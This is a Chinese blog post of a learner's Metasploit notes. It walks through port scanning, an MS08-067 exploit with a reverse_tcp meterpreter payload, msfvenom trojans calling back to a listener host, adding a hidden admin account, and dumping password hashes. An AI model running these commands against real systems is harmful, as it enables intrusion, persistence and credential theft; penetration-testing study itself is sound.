Kali的msf模塊利用之我的理解


題記

       Cracer的教學視頻快看完了,對於基礎的學習還是十分有幫助的,還是要多看看大佬們寫的騷姿勢文章。最近補天申請了個團隊,原來人家是別的平台轉過來的,太尷尬了,還要求一月10個洞,激勵一下自己吧,挖不完我就退了。哎,補天真是太嚴格了,全校師生的學號姓名專業信息泄露給算了低危,聞者傷心,見者流淚。

       Msf模塊終於有了新的理解,以前只會生成個木馬和利用。學習之路還很長啊,還是系統性的學一下cs吧。Msf第一次利用需要安裝數據庫。

       netstat -tnlp 查看運行的端口

掃端口模塊

       1、msfconsole

       2、search portscan 搜索掃描端口的模塊

       3、show auxiliary 展示auxiliary下有什么模塊(有好多)

       4、use auxiliary/scanner/portscan/syn 使用這個模塊

       5、show options 展示需要填充的內容

       6、set ports 21-25,80-90,135,139,445,1433,3306,3389設置變量

       7、setg rhosts 192.168.3.0/24 設置目標

       8、setg threads 50 線程調高

       9、run

特定服務掃描(其他服務類似)setg全局設置

       1、search smb_version

       2、use auxiliary/scanner/smb/smb_version

       3、show options

       4、setg rhosts 192.168.3.0/24

       5、setg threads 50

       6、run

按照漏洞編號對端口進行攻擊

       1、search ms08_067 有哪個漏洞去網上搜漏洞編號

       2、use exploit/windows/smb/ms08_067_netapi

       3、 set rhost目標ip

       4、show target

       5、set target 34

       6、 set payload windows/meterpreter/reverse_tcp 利用成功后調用msf平台反彈會話

       7、show options

       8、setg lhost 本地ip

       9、set lport 本地端口

       10、exploit

       漏洞利用成功會彈出meterpreter模塊

       1、ps 查看正在運行的進程

       2、migrate 1404 遷移進程,最好找個具有系統權限的進程

       3、run vnc 可以監控屏幕

       4、screenshot 截屏

       5、shell 操作對方cmd

制作木馬上傳並運行反彈shell

       1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.118 lport=1311 -f exe > /root/x.exe 生成windows木馬

       Msfvenom -p linux/merterpreter/reverse_tcp lhost=192.168.3.118 lport=1312 -f elf < /root/linux 生成linux木馬

       2、use exploit/multi/handler 開啟監聽

       3、set payload windows/meterpreter/reverse_tcp

       4、set lhost 192.168.3.118

       5、set lport 1311

       6、show options

       7、exploit

       8、監聽開啟后,讓木馬在目標上運行,獲得控制權限。

       獲得權限后

       1、ps

       2、shell 調出cmd創建用戶

       3、net user cc 123.com /add

       4、net localgroup adminstrators cc /add

       5、migrate 1388

       6、hashdump

       如果獲得多個計算機的權限可以

       1、background 把當前權限放到后台

       2、sessions -l 查看有幾個權限

       3、session -i 1 切換權限


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM